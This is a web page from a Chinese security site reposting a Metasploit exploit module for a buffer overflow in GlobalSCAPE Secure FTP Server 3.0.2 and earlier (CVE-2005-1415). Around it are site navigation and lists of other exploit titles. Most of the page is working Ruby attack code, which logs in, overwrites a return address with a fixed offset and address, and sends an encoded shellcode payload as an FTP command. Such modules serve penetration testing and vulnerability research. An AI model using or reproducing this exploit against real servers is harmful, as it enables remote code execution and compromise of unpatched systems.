首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GlobalSCAPE Secure FTP Server Input Overflow(MSF)
来源:http://www.metasploit.com 作者:Aharoni 发布时间:2009-11-26  
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'GlobalSCAPE Secure FTP Server Input Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. 
				All versions prior to 3.0.3 are affected by this flaw. A valid user account (
				or anonymous access) is required for this exploit to work.		
			},
			'Author'         => [ 'Fairuzan Roslan <riaf [at] mysec.org>', 'Mati Aharoni <mati [at] see-security.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision
, 'References' => [ [ 'CVE', '2005-1415'], [ 'OSVDB', '16049'], [ 'BID', '13454'], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x20\x61\x62\x63\x64\x65\x66\x67\x68\x69" + "\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74" + "\x75\x76\x77\x78\x79\x7a", 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", }, 'Targets' => [ [ 'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal', { 'Platform' => 'win', 'Ret' => 0x1002f01f, }, ], ], 'DisclosureDate' => 'May 1 2005', 'DefaultTarget' => 0)) end def exploit connect_login buf = make_nops(3047) buf[2043, 4] = [ target.ret ].pack('V') buf[2047, payload.encoded.length] = payload.encoded send_cmd( [buf] ) handler disconnect end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Borland Interbase Create-Reque
·Microsoft IIS 5.0 IDQ Path Ove
·Novell eDirectory NDS Server H
·CA eTrust PestPatrol ActiveX C
·Winamp Ultravox Streaming Meta
·Oracle 9i XDB FTP UNLOCK Overf
·HP OpenView Operations OVTrace
·Serenity Audio Player Playlist
·CA BrightStor ARCserve Backup
·电子斗音乐get shell漏洞
·'TrackerCam PHP Argument Buffe
·TYPSoft FTP server remote deni
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved